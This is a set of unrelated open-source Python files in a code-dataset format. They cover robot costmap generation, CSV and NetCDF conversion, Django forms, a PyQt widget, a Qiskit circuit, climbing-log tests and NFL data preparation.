If the name of the model is different, this should be None.\n \n Returns:\n - costmap:\n Tensor of dimensions as given by the map_metadata: (height/resolution, width/resolution) containing inferred costmap from learned model.\n '''\n print(\"\\n\\n\\n====\\nINSIDE ENSAMBLE PRODUCE COSTMAP\\n====\\n\\n\\n\")\n print(f\"costmap_batch_size: {costmap_batch_size}, costmap_stride: {costmap_stride}\")\n device = \"cuda\" # \"cuda\" if torch.cuda.is_available() else \"cpu\"\n tm = TerrainMap(maps=maps, map_metadata=map_metadata, device=device)\n\n\n # Get tensor of all map poses to be queried\n map_height = int(map_metadata['height']/map_metadata['resolution'])\n map_width = int(map_metadata['width']/map_metadata['resolution'])\n x_pixels = torch.arange(0, map_height, costmap_stride)\n y_pixels = torch.arange(0, map_width, costmap_stride)\n x_poses = x_pixels*map_metadata['resolution']+map_metadata[\"origin\"][0]\n y_poses = y_pixels*map_metadata['resolution']+map_metadata[\"origin\"][1]\n all_poses = torch.stack(torch.meshgrid(x_poses, y_poses, indexing=\"ij\"), dim=-1).view(-1, 2)\n # Append orientations\n all_poses = torch.cat([all_poses, torch.zeros(all_poses.shape[0], 1)], dim=-1).to(device).detach()\n\n num_cells = all_poses.shape[0]\n num_batches = ceil(num_cells/costmap_batch_size)\n batch_starts = [(k)*costmap_batch_size for k in range(num_batches)]\n batch_ends = [min(((k+1)*costmap_batch_size), num_cells) for k in range(num_batches)]\n\n all_costmaps = []\n\n all_map_vals = None\n all_invalid = None\n\n # Query all map poses from TerrainMap\n for b in range(num_batches):\n patches = tm.get_crop_batch(poses=all_poses[batch_starts[b]:batch_ends[b]], crop_params=crop_params)\n invalid_flags = process_invalid_patches(patches, thresh=0.5)\n\n # Get input to network\n input_data = {}\n input_data['patches'] = patches.cuda()\n if vel is not None:\n vels_vec = (torch.ones(patches.shape[0], 1) * vel/20.0).cuda()\n else:\n vels_vec = None\n if fourier_freqs is not None:\n fourier_freqs = fourier_freqs.cuda()\n fourier_vels = (FourierFeatureMapping(vels_vec, fourier_freqs)).cuda()\n else:\n fourier_vels = None\n input_data['vels'] = vels_vec\n input_data['fourier_vels'] = fourier_vels\n\n # Pass patches and vels through network\n costs = model(input_data)\n concat_costs = torch.cat(costs, axis=1)\n if all_map_vals is None:\n all_map_vals = concat_costs\n all_invalid = invalid_flags\n else:\n all_map_vals = torch.cat([all_map_vals, concat_costs])\n all_invalid = torch.cat([all_invalid, invalid_flags])\n \n # import pdb;pdb.set_trace()\n # costs[invalid_flags] = 0.5 # TODO Uncomment this line if you want to set high costs to invalid areas\n\n # if len(costs.shape) > 1:\n # costs = costs.squeeze()\n # if len(costs.shape) < 1:\n # costs = costs.view(-1)\n # all_costs.append(costs)\n # import pdb;pdb.set_trace()\n mean_cost = torch.mean(all_map_vals.detach(), axis=1)\n # mean_cost = all_map_vals[:,1].detach()\n std_cost = torch.std(all_map_vals.detach(), axis=1)\n \n # Handle invalid cells\n mean_cost[all_invalid] = 1.0\n\n # Reshape cost predictions into costmap\n reduced_mean_costmap = mean_cost.view(1, 1, x_pixels.shape[0], y_pixels.shape[0])\n reduced_std_costmap = std_cost.view(1, 1, x_pixels.shape[0], y_pixels.shape[0])\n\n mean_costmap = torch.nn.functional.interpolate(reduced_mean_costmap, size=(map_height,map_width), mode='bilinear', align_corners=True)\n std_costmap = torch.nn.functional.interpolate(reduced_std_costmap, size=(map_height,map_width), mode='bilinear', align_corners=True)\n\n 
mean_costmap = mean_costmap.squeeze().cpu().numpy()\n std_costmap = std_costmap.squeeze().cpu().numpy()\n\n for k in range(all_map_vals.shape[1]):\n costmap_vector = all_map_vals[:,k].detach()\n costmap_vector[all_invalid] = 1.0\n reduced_costmap = costmap_vector.view(1, 1, x_pixels.shape[0], y_pixels.shape[0])\n costmap = torch.nn.functional.interpolate(reduced_costmap, size=(map_height,map_width), mode='bilinear', align_corners=True)\n costmap = costmap.squeeze().cpu().numpy()\n all_costmaps.append(costmap)\n\n return mean_costmap, std_costmap, all_costmaps\n\n\ndef rosmsgs_to_maps(rgbmap, heightmap):\n '''Converts input rgbmaps and heightmaps from numpy arrays incoming from ros msgs to tensors that can be passed into produce_costmap.\n\n Args:\n - rgbmap:\n HxWx3 Uint8 array containing rgbmap input from ros topic.\n - heightmap:\n HxWx4 Float array containing the following info about heightmap: min, max, mean, std.\n Returns:\n - maps:\n Dictionary containing two tensors:\n {\n 'rgb_map': Tensor(C,H,W) where C=3 corresponding to RGB values,\n 'height_map': Tensor(C,H,W) where C=5 corresponding to min, max, mean, std, invalid_mask where 1's correspond to invalid cells\n }\n '''\n ## First, convert rgbmap to tensor\n img_transform = T.Compose([\n T.ToTensor(),\n T.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n rgb_map_tensor = img_transform(rgbmap.astype(np.uint8))\n # Change axes so that map is aligned with robot-centric coordinates\n rgb_map_tensor = rgb_map_tensor.permute(0,2,1)\n\n ## Now, convert heightmap to tensor\n hm = torch.from_numpy(heightmap)\n hm_nan = torch.isnan(hm).any(dim=-1, keepdim=True) | (hm > 1e5).any(dim=-1, keepdim=True) | (hm < -1e5).any(dim=-1, keepdim=True)\n hm = torch.nan_to_num(hm, nan=0.0, posinf=2, neginf=-2)\n hm = torch.clamp(hm, min=-2, max=2)\n hm = (hm - (-2))/(2 - (-2))\n hm = torch.cat([hm, hm_nan], dim=-1)\n hm = hm.permute(2,0,1)\n height_map_tensor = hm.permute(0,2,1)\n\n maps = {\n 'rgb_map':rgb_map_tensor,\n 'height_map':height_map_tensor\n }\n\n return maps\n\n\ndef local_path_to_pixels(local_path, map_metadata):\n '''Returns the pixel locations of a local_path in the costmap.\n \n Args:\n - local_path:\n Nx3 array of local path obtained from odometry\n - map_metadata:\n Dictionary containing metadata for costmap. 
Has the following structure:\n {\n 'height': map_height [m],\n 'width': map_width [m],\n 'resolution': resolution [m],\n 'origin': origin [m]\n }\n '''\n\n x_positions = local_path[:,0]\n y_positions = local_path[:,1]\n\n x_pixels = ((x_positions - map_metadata[\"origin\"][0])/map_metadata[\"resolution\"]).long()\n y_pixels = ((y_positions - map_metadata[\"origin\"][1])/map_metadata[\"resolution\"]).long()\n\n return x_pixels, y_pixels\n","repo_name":"castacks/learned_cost_map","sub_path":"scripts/learned_cost_map/utils/costmap_utils.py","file_name":"costmap_utils.py","file_ext":"py","file_size_in_byte":18168,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"54"} +{"seq_id":"1118005679","text":"def print_fibonacci_sequence():\n\n sequence_controller = 0\n index = 0\n first_term = 1\n sum = 0\n\n number_of_sequence = int(input(\"Please enter a number and see the fibonacci sequence: \"))\n\n #A storage that holds the sum of the previous two numbers\n sum_storage = [1]\n print(f\"The first {number_of_sequence + 1} number of the fibonacci series is : {first_term}\", end=\" \")\n\n #Iterate the whole process by adding the current sum to the previous number in the list\n while(sequence_controller < number_of_sequence):\n sum += sum_storage[index - 1]\n print(sum, end=\" \")\n sum_storage.append(sum)\n sequence_controller+=1\n index+=1\n print(\"\\nThe nth number in the fibonnaci series is: \",sum)\n\nprint_fibonacci_sequence()\n","repo_name":"Sanusi1997/python_power_of_computing_exercises","sub_path":"functions/fibonnaci_sequence.py","file_name":"fibonnaci_sequence.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8736559249","text":"import datetime as dt\nimport pathlib as pl\nfrom typing import Union\n\nimport netCDF4 as nc4\nimport numpy as np\nimport pandas as pd\n\nfrom ..base import meta\n\nfileish = Union[str, pl.PosixPath, dict]\n\n\nclass CsvFile:\n \"\"\"CSV file object\n path: a string, pathlib.Path or dict. The key of the dict can be used\n to rename the variable in the recarray and upon output to Netcdf.\n The value of the dict should be a string or a pathlib.Path. 
Only\n dicts of len 1 are allowed currently.\n\n \"\"\"\n\n def __init__(\n self,\n path: fileish = None,\n convert: bool = False,\n ) -> \"CsvFile\":\n self.paths = {}\n if path is not None:\n self._add_path(path)\n self.convert = convert\n self._variables = None\n self._coordinates = None\n self._data = None\n self.meta = meta\n\n @property\n def nhm_id(self) -> list:\n \"\"\"Get a list of nhm ids\n\n Returns:\n nhm_ids: list of nhm ids\n\n \"\"\"\n self._lazy_data_evaluation()\n\n key = \"nhm_id\"\n if key in self._coordinates.keys():\n nhm_ids = self._coordinates[key]\n else:\n nhm_ids = None\n return nhm_ids\n\n @property\n def nhm_seg(self) -> list:\n \"\"\"Get a list of nhm segments\n\n Returns:\n nhm_segs: list of nhm segments\n\n \"\"\"\n self._lazy_data_evaluation()\n\n key = \"nhm_seg\"\n if key in self._coordinates.keys():\n nhm_segs = self._coordinates[key]\n else:\n nhm_segs = None\n return nhm_segs\n\n @property\n def variable_names(self) -> list:\n \"\"\"Get a list of unique variables\n\n Returns:\n variables: list of variables\n\n \"\"\"\n self._lazy_data_evaluation()\n return self._variables\n\n @property\n def data(self) -> np.recarray:\n \"\"\"Get csv output data as a numpy recarray\n\n Returns:\n data : numpy recarray containing all of the csv data\n\n \"\"\"\n self._lazy_data_evaluation()\n return self._data\n\n def add_path(\n self,\n path: fileish,\n ) -> None:\n \"\"\"Add a csv output file path to the object\n\n Args:\n name: path for csv output file\n\n Returns:\n None\n\n \"\"\"\n\n self._add_path(path)\n\n def to_dataframe(self) -> pd.DataFrame:\n \"\"\"Get the csv output data as a pandas dataframe\n\n Returns:\n df: csv output data as a pandas dataframe\n\n \"\"\"\n self._lazy_data_evaluation()\n df = pd.DataFrame(self._data).set_index(\"date\")\n return df\n\n def to_netcdf(\n self,\n name: fileish,\n global_atts: dict = None,\n clobber: bool = True,\n zlib: bool = True,\n complevel: int = 4,\n chunk_sizes: dict = {\"time\": 30, \"hruid\": 0},\n ) -> None:\n \"\"\"Output the csv output data to a netcdf file\n\n Args:\n name: path for netcdf output file\n clobber: boolean indicating if an existing netcdf file should\n be overwritten\n zlib: boolean indicating if the data should be compressed\n (default is True)\n complevel: compression level (default is 4)\n chunk_sizes: dictionary defining chunk sizes for the data\n\n Returns:\n None\n\n \"\"\"\n self._lazy_data_evaluation()\n\n ds = nc4.Dataset(name, \"w\", clobber=clobber)\n ds.setncattr(\"Description\", \"PRMS output data\")\n if global_atts is not None:\n for key, val in global_atts.items():\n ds.setncattr(key, val)\n\n # Dimensions\n # None for the len argument gives an unlimited dim\n ntimes = self._data.shape[0]\n ds.createDimension(\"time\", ntimes)\n for key, value in self._coordinates.items():\n ds.createDimension(key, len(value))\n\n # Dim Variables\n time = ds.createVariable(\"time\", \"f4\", (\"time\",))\n start_date = self._data[\"date\"][0].strftime(\"%Y-%m-%d %H:%M:%S\")\n time_units = f\"days since {start_date}\"\n time.units = time_units\n time[:] = nc4.date2num(\n self._data[\"date\"].astype(dt.datetime),\n units=time_units,\n calendar=\"standard\",\n )\n\n for key, value in self._coordinates.items():\n coord_id = ds.createVariable(key, \"i4\", (key))\n coord_id[:] = np.array(value, dtype=int)\n\n dimensions = self.meta.get_dimensions(self.variable_names)\n\n # Variables\n for variable_name in self.variable_names:\n if self.meta.is_available(variable_name):\n meta_dict = 
self.meta.find_variables(variable_name)\n variable_type = meta.meta_netcdf_type(meta_dict[variable_name])\n dimension = dimensions[variable_name]\n if \"nsegment\" in dimension:\n dim_name = \"nhm_seg\"\n else:\n dim_name = \"nhm_id\"\n dtype = meta.meta_numpy_type(meta_dict[variable_name])\n else:\n variable_type = \"f4\"\n dim_name = \"nhm_id\"\n dtype = np.float32\n\n ids = self._coordinates[dim_name]\n nids = len(ids)\n\n var = ds.createVariable(\n variable_name,\n variable_type,\n (\"time\", dim_name),\n fill_value=nc4.default_fillvals[variable_type], # JLM: sus\n zlib=zlib,\n complevel=complevel,\n chunksizes=tuple(chunk_sizes.values()),\n )\n # add additional meta data\n if self.meta.is_available(variable_name):\n var_meta = self.meta.find_variables(variable_name)[\n variable_name\n ]\n for key, val in var_meta.items():\n if isinstance(val, dict):\n continue\n ds.variables[variable_name].setncattr(key, val)\n\n arr = np.zeros((ntimes, nids), dtype=dtype)\n for idx, on_id in enumerate(ids):\n key = f\"{variable_name}_{on_id}\"\n arr[:, idx] = self._data[key][:]\n ds.variables[variable_name][:, :] = arr\n\n ds.close()\n print(f\"Wrote netcdf file: {name}\")\n return\n\n def _add_path(\n self,\n path: fileish,\n ):\n if isinstance(path, (str, pl.Path)):\n path = pl.Path(path)\n self.paths[path.stem] = path\n elif isinstance(path, dict):\n if len(path) > 1:\n raise ValueError(\"Only dicts of len 1 allowed currently\")\n for key, val in path.items():\n self.paths[key] = pl.Path(val)\n else:\n raise TypeError(f\"{path} must be a string, dict or pathlib.Path object\")\n\n def _lazy_data_evaluation(self):\n if self._data is None:\n self._get_data()\n\n def _get_data(self) -> None:\n \"\"\"Read csv data into a single numpy recarray\n\n Returns:\n None\n\n \"\"\"\n str2date = lambda x: dt.datetime.strptime(\n x.decode(\"utf-8\"), \"%Y-%m-%d\"\n )\n all_data = []\n ntimes = 0\n dtype = [(\"date\", dt.datetime)]\n for variable_name, path in self.paths.items():\n if path.exists():\n try:\n arr = np.genfromtxt(\n path,\n dtype=None,\n names=True,\n delimiter=\",\",\n converters={0: str2date},\n )\n except Exception:\n raise IOError(f\"numpy could not parse...'{path}'\")\n\n if self._variables is None:\n self._variables = [variable_name]\n else:\n self._variables.append(variable_name)\n\n # determine the variable type\n if self.meta.is_available(variable_name):\n variable_type = meta.meta_numpy_type(\n self.meta.find_variables(variable_name)[variable_name]\n )\n if (\n \"nsegment\"\n in self.meta.get_dimensions(variable_name)[variable_name]\n ):\n coordinate_name = \"nhm_seg\"\n else:\n coordinate_name = \"nhm_id\"\n else:\n variable_type = np.float32\n coordinate_name = \"nhm_id\"\n\n # set coordinates\n if self._coordinates is None:\n self._coordinates = {}\n if coordinate_name not in list(self._coordinates.keys()):\n self._coordinates[coordinate_name] = [\n idx for idx in arr.dtype.names[1:]\n ]\n\n column_names = [\n f\"{variable_name}_{idx.strip()}\" for idx in arr.dtype.names[1:]\n ]\n arr.dtype.names = [\"date\"] + column_names\n\n # add additional column names to the dtype\n for name in column_names:\n dtype.append((name, variable_type))\n\n all_data.append(arr)\n\n # reset ntimes, if necessary\n ntimes = max(arr.shape[0], ntimes)\n\n self._data = np.zeros(ntimes, dtype=dtype)\n for idx, arr in enumerate(all_data):\n if idx == 0:\n i0 = 0\n else:\n i0 = 1\n for name in arr.dtype.names[i0:]:\n self._data[name][:] = 
arr[name][:]\n","repo_name":"smwesten-usgs/pyswb","sub_path":"pyswb/utils/csv_utils.py","file_name":"csv_utils.py","file_ext":"py","file_size_in_byte":9618,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"71836374560","text":"from django import forms\nfrom .models import Event, weekendSignupEntry, abroadSignupEntry, beginnerSignupEntry\nfrom django.contrib.auth import get_user_model\n \n\nclass weekendSignupForm(forms.ModelForm):\n class Meta:\n model = weekendSignupEntry\n labels = {\n \"borrowBoard\": \"Do you need to borrow a board?\",\n \"bringBoard\": \"Are you bringing a board?\",\n \"wetsuit\": \"Do you need to borrow a wetsuit?\",\n \"driveCar\": \"I can drive a car for this trip\",\n \"roofRacks\": \"Can you put a roofrack on your car?\",\n \"carSeats\": \"How many seats does your car have? (Inc. Driver)\",\n \"driveMinibus\": \"I can drive a Minibus for this trip\",\n \"tent\": \"If you own a tent how many people can it sleep?\",\n }\n\n fields = [\n 'borrowBoard',\n 'bringBoard',\n 'wetsuit',\n 'driveCar',\n 'roofRacks',\n 'carSeats',\n 'driveMinibus',\n 'tent',\n 'endQuestionAnswer',\n ]\n\n exclude = ['timestamp']\n\nclass abroadSignupForm(forms.ModelForm):\n class Meta:\n model = abroadSignupEntry\n labels = {\n \"rental\": \"Do you want to rent equipment?\",\n \"lessons\": \"Do you want lessons?\",\n }\n\n fields = [\n 'rental',\n 'lessons',\n 'endQuestionAnswer',\n ]\n\n exclude = ['timestamp']\n\nclass beginnerSignupForm(forms.ModelForm):\n class Meta:\n model = beginnerSignupEntry\n labels = {\n \"borrowBoard\": \"Do you need to borrow a board?\",\n \"wetsuit\": \"Do you need to borrow a wetsuit?\",\n \"driveCar\": \"I can drive a car for this trip\",\n \"roofRacks\": \"Can you put a roofrack on your car?\",\n \"carSeats\": \"How many seats does your car have? (Inc. 
Driver)\",\n }\n\n fields = [\n 'borrowBoard',\n 'wetsuit',\n 'driveCar',\n 'roofRacks',\n 'carSeats',\n 'endQuestionAnswer',\n ]\n\n exclude = ['timestamp']\n\n","repo_name":"Rhetora/susurf-web-public","sub_path":"events/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9915774488","text":"from PyQt5.QtCore import QSortFilterProxyModel, Qt\nfrom PyQt5.QtWidgets import QComboBox, QCompleter\n\n\nclass ExtendedComboBox(QComboBox):\n def __init__(self, parent=None):\n super(ExtendedComboBox, self).__init__(parent)\n\n self.setFocusPolicy(Qt.StrongFocus)\n self.setEditable(True)\n\n # add a filter model to filter matching items\n self.pFilterModel = QSortFilterProxyModel(self)\n self.pFilterModel.setFilterCaseSensitivity(Qt.CaseInsensitive)\n self.pFilterModel.setSourceModel(self.model())\n\n # add a completer, which uses the filter model\n self.completer = QCompleter(self.pFilterModel, self)\n # always show all (filtered) completions\n self.completer.setCompletionMode(QCompleter.UnfilteredPopupCompletion)\n self.setCompleter(self.completer)\n\n # connect signals\n self.lineEdit().textEdited.connect(self.pFilterModel.setFilterFixedString)\n self.completer.activated.connect(self.on_completer_activated)\n\n # on selection of an item from the completer, select the corresponding item from combobox\n def on_completer_activated(self, text):\n if text:\n index = self.findText(text)\n self.setCurrentIndex(index)\n self.activated[str].emit(self.itemText(index))\n\n # on model change, update the models of the filter and completer as well\n def setModel(self, model):\n super(ExtendedComboBox, self).setModel(model)\n self.pFilterModel.setSourceModel(model)\n self.completer.setModel(self.pFilterModel)\n\n # on model column change, update the model column of the filter and completer as well\n def setModelColumn(self, column):\n self.completer.setCompletionColumn(column)\n self.pFilterModel.setFilterKeyColumn(column)\n super(ExtendedComboBox, self).setModelColumn(column)\n","repo_name":"hongyaohongyao/smart_classroom_demo","sub_path":"smart_classroom/my_combox.py","file_name":"my_combox.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":142,"dataset":"github-code","pt":"54"} +{"seq_id":"9984366856","text":"\nfrom qiskit import QuantumProgram, QuantumCircuit\nfrom qiskit.extensions.standard import header\nfrom qiskit import CompositeGate\n\nAPI_FILE = open(\"API_TOKEN.txt\")\nAPI_TOKEN = API_FILE.readlines()[0]\n\nfrom qiskit.tools.visualization import plot_histogram\n\nqp = QuantumProgram()\nqp.set_api(API_TOKEN, API_URL)\n\nq = qp.create_quantum_register('q', 5)\nc = qp.create_classical_register('c', 1)\ncl = qp.create_circuit('cl', [q], [c])\n\n#prepare states\n\ncl.h(q[0])\ncl.h(q[1])\ncl.barrier(q)\n\ncl.cu3(4.304, 0, 0, q[0], q[1])\n\ncl.x(q[0])\n\ncl.ccx(q[0], q[1], q[2])\n\ncl.x(q[1])\n\n#begin controlled-controlled u3\ncl.barrier(q)\n\ncl.cx(q[1], q[2])\ncl.u3(-0.331, 0, 0, q[2])\ncl.ccx(q[0], q[1], q[2])\ncl.cx(q[1], q[2])\ncl.u3(-0.331, 0, 0, q[2])\ncl.cx(q[1], q[2])\ncl.u3(0.331, 0, 0, q[2])\n\n#end controlled-controlled u3\ncl.barrier(q)\n\ncl.swap(q[2],q[3])\ncl.cx(q[2],q[1])\ncl.h(q[0])\n\ncl.barrier(q)\n#measure qbits\ncl.measure(q[2],c[0])\n\n\n#running\n\nbackend_test = \"local_qasm_simulator\"\nshots = 8000\n\nresult = qp.execute('cl', backend=backend_test, timeout=2400, shots=shots)\n\n\ndata = 
result.get_counts('cl')\n\nplot_histogram(data)\n","repo_name":"4-space/Quantum-Nearest-Neighbors","sub_path":"quantum_nearest_neighbors.py","file_name":"quantum_nearest_neighbors.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"5051764905","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport os, glob, sys\r\nimport argparse\r\nimport pandas as pd\r\n\r\n\r\nscript_realpath = os.path.realpath(__file__)\r\nscript_dir = os.path.dirname(script_realpath)\r\n\r\n# print(script_realpath)\r\n# print(script_dir)\r\n\r\nclass bcolors:\r\n HEADER = '\\033[95m'\r\n OKBLUE = '\\033[94m'\r\n OKCYAN = '\\033[96m'\r\n OKGREEN = '\\033[92m'\r\n WARNING = '\\033[93m'\r\n FAIL = '\\033[91m'\r\n ENDC = '\\033[0m'\r\n BOLD = '\\033[1m'\r\n UNDERLINE = '\\033[4m'\r\n\r\n# Parse command-line options\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"-c\", \"--csv-dir\", dest='csv_dir', help=\"Directory containing the CSV files.\", required=True)\r\nparser.add_argument(\"-o\", \"--output-file\", dest='output_file', help=\"Name of the generated CSV file.\", required=True)\r\n\r\nif len(sys.argv)==1:\r\n parser.print_help(sys.stderr)\r\n print(\"\\n\")\r\n exit(1)\r\nargs = parser.parse_args()\r\n\r\n\r\nCSV_DIR = os.path.realpath(args.csv_dir)\r\nOUTFILE = os.path.join(CSV_DIR, args.output_file+\".stats_merged.csv\")\r\n\r\n## CSV merged dataframe\r\nCSV_DF = pd.DataFrame()\r\n\r\n# Enter csv dir\r\nos.chdir(CSV_DIR)\r\ncwd = os.getcwd()\r\n\r\n\r\n# Merge CSVs\r\ntool_filter=\"*.stats.csv\"\r\nfor csv in glob.glob(tool_filter):\r\n print(f\"Merging CSV: {csv}...\")\r\n df = pd.read_csv(csv)\r\n CSV_DF = pd.concat([CSV_DF, df]).groupby(['Datetime']).sum().reset_index()\r\n\r\n# Leave csv dir\r\nos.chdir(script_dir)\r\n\r\n# Save dataset file\r\nCSV_DF.to_csv(OUTFILE, index=False)\r\n\r\nprint (\"\")\r\nprint(f\"{bcolors.BOLD}************************************************************************************************{bcolors.ENDC}\")\r\nprint(f\"{'CSV_DIR:':>16} {CSV_DIR}\")\r\nprint (\"\")\r\nprint(f\"{bcolors.OKGREEN} MERGED CSV: {bcolors.HEADER+bcolors.BOLD}{os.path.realpath(OUTFILE)}{bcolors.ENDC}\")\r\nprint(f\"{bcolors.BOLD}************************************************************************************************{bcolors.ENDC}\")\r\nprint (\"\")\r\n","repo_name":"lbfiorino/mpca_pub","sub_path":"graficos/merge_datetime_stats.py","file_name":"merge_datetime_stats.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"3144138015","text":"# __author__ = 'ming'\n# coding=utf-8\n\n# Status codes and their descriptions\nCodeMsg = {\n \"0\": \"Success\",\n \"-1\": \"Failure\",\n \"404\": \"Please log in first\",\n \"505\": \"Missing parameter\",\n \"606\": \"No permission for this operation\",\n \"1001\": \"Invalid parameter format\",\n \"1002\": \"Incorrect account or password\",\n \"2001\": \"Missing 'method' field; cannot determine the intended operation\",\n \"2002\": \"This board already contains sub-boards\",\n \"2003\": \"Failed to delete this board, please try again later\"\n}\n\nSuccessCode = \"0\"\nFailCode = \"-1\"\nNoLoginCode = \"404\"\nNohasParamCode = \"505\"\nNoPermissionCode = \"606\"\nParamErrCode = \"1001\"\nAccountOrPwErrCode = \"1002\"\n\n# Boards\nNoMethodErrCode = \"2001\"\nHasSmallBoardsCode = \"2002\"\nFailDeleteBigCode = \"2003\"","repo_name":"BPing/pyWebpj","sub_path":"python/globals/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}
{"seq_id":"2489281665","text":"import json\nimport pytest\nimport tempfile\n\nimport tick\n\n\ndef test_encode_decode():\n send = tick.Send(\"name\", \"grade\", \"2000-01-01\", \"location\", \"style\", \"notes\")\n encoded = json.dumps(send, cls=tick.SendEncoder)\n decoded = json.loads(encoded, object_hook=tick.as_send)\n assert send == decoded\n\n\ndef test_save_load():\n send = tick.Send(\"name\", \"grade\", \"2000-01-01\", \"location\", \"style\", \"notes\")\n sends = list()\n sends.append(send)\n sends.append(send)\n with tempfile.NamedTemporaryFile() as f:\n filename = f.name\n tick.save(filename, sends)\n loaded = tick.load(filename)\n assert loaded == sends\n\n\ndef test_convert_mp_csv():\n with tempfile.NamedTemporaryFile() as f:\n filename = f.name\n mp_content = b\"\"\"2020-06-07,\"
Hole\",V6,,https://www.mountainproject.com/route/106807930/the-hole,1,\"Washington > Central-East Cascades, Wenatchee, & Leavenworth > Icicle Creek > ** Bouldering in Icicle Creek > Mad Meadows\",3.4,-1,Send,,Boulder,,10,20600\"\"\"\n f.write(mp_content)\n f.seek(0)\n mp_sends = tick.convert_mp_csv(f.name)\n\n send = tick.Send(\n \"The Hole\",\n \"V6\",\n \"2020-06-07\",\n \"Washington > Central-East Cascades, Wenatchee, & Leavenworth > Icicle Creek > ** Bouldering in Icicle Creek > Mad Meadows\",\n \"Send\",\n \"\",\n )\n assert send == mp_sends[0]\n\n\ndef test_filter_by_date_before():\n sends = list()\n sends.append(tick.Send(\"before\", \"v0\", \"1999-12-31\", \"location\", \"send\", \"notes\",))\n sends.append(tick.Send(\"after\", \"v0\", \"2000-01-01\", \"location\", \"send\", \"notes\",))\n filtered = tick.filter_by_date(sends, \"2000-01-01\", tick.DateComparison.BEFORE)\n assert len(filtered) == 1\n assert filtered[0].name == \"before\"\n\n\ndef test_filter_by_date_after():\n sends = list()\n sends.append(tick.Send(\"before\", \"v0\", \"1999-12-31\", \"location\", \"send\", \"notes\",))\n sends.append(tick.Send(\"after\", \"v0\", \"2000-01-01\", \"location\", \"send\", \"notes\",))\n filtered = tick.filter_by_date(sends, \"2000-01-01\", tick.DateComparison.AFTER)\n assert len(filtered) == 1\n assert filtered[0].name == \"after\"\n\ndef test_years_active():\n sends = list()\n sends.append(tick.Send(\"before\", \"v0\", \"1999-12-31\", \"location\", \"send\", \"notes\",))\n sends.append(tick.Send(\"before\", \"v0\", \"2003-12-31\", \"location\", \"send\", \"notes\",))\n sends.append(tick.Send(\"before\", \"v0\", \"2020-12-31\", \"location\", \"send\", \"notes\",))\n years = tick.years_active(sends)\n assert years == {1999, 2003, 2020}\n\ndef test_sends_in_year():\n sends = list()\n sends.append(tick.Send(\"before\", \"v0\", \"1999-12-31\", \"location\", \"send\", \"notes\",))\n sends.append(tick.Send(\"included_0\", \"v0\", \"2003-12-31\", \"location\", \"send\", \"notes\",))\n sends.append(tick.Send(\"included_1\", \"v0\", \"2003-01-01\", \"location\", \"send\", \"notes\",))\n sends.append(tick.Send(\"before\", \"v0\", \"2020-12-31\", \"location\", \"send\", \"notes\",))\n sends_in_2003 = tick.sends_in_year(sends, 2003)\n expected = sends[1:3]\n assert sends_in_2003 == expected\n\n\n\n","repo_name":"tyler-moody/tick","sub_path":"test_tick.py","file_name":"test_tick.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"69911701921","text":"# __author__ = 'ming'\n# coding=utf-8\n\n# 返回状态代码与描述\nCodeMsg = {\n \"0\": \"成功\",\n \"-1\": \"失败\",\n \"404\": \"请先登录\",\n \"505\": \"参数缺失\",\n \"606\": \"没有此操作权限\",\n \"1001\": \"参数格式错误\",\n \"1002\": \"账户或者密码错误\",\n \"2001\": \"缺少method字段,无法确定您的操作目的\",\n \"2002\": \"该版块已存在小版块\",\n \"2003\": \"删除该版块失败,请稍后重试\"\n}\n\nSuccessCode = \"0\"\nFailCode = \"-1\"\nNoLoginCode = \"404\"\nNohasParamCode = \"505\"\nNoPermissionCode = \"606\"\nParamErrCode = \"1001\"\nAccountOrPwErrCode = \"1002\"\n\n# Boards\nNoMethodErrCode = \"2001\"\nHasSmallBoardsCode = \"2002\"\nFailDeleteBigCode = \"2003\"","repo_name":"BPing/pyWebpj","sub_path":"python/globals/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"2489281665","text":"'''\nThis script prepares data and creates basic features for the NFL 1st and Future 2020\nchallenge. 
It also reduces the memory footprint of datasets and\nsaves them to a memory-efficient format.\n\n'''\n\n#%%\nimport numpy as np\nimport pandas as pd\nimport sys\nfrom tqdm import tqdm\n\nimport skmem #my utility script\n\n\n#%%\ndef convert_days(df, daycols):\n day_buckets = np.array([1, 7, 28, 42])\n days_matrix = df[daycols] * day_buckets\n days_column = days_matrix.max(axis=1)\n return days_column\n\ndef convert_keys(df):\n df = df.fillna({'PlayKey': '0-0-0'})\n try:\n id_array = df.GameID.str.split('-', expand=True).to_numpy()\n except:\n id_array = df.PlayKey.str.split('-', expand=True).to_numpy()\n df['PlayerKey'] = id_array[:,0].astype(int)\n df['GameID'] = id_array[:,1].astype(int)\n df['PlayKey'] = df.PlayKey.str.extract(r'([0-9]+$)').astype(int)\n return df\n\ndef get_rest(group_):\n days_rest = group_.PlayerDay - group_.PlayerDay.shift()\n return pd.Series(days_rest, name='DaysRest').fillna(0).astype(np.int16)\n\nkey_cols = ['PlayerKey', 'GameID', 'PlayKey']\n\n\n#%%#################\n## Plays & Injuries\n#\n\nplaylist = pd.read_csv('../input/nfl-playing-surface-analytics/PlayList.csv')\nprint(playlist.info())\nplaylist = convert_keys(playlist)\nplaylist = playlist.fillna({'PlayType': 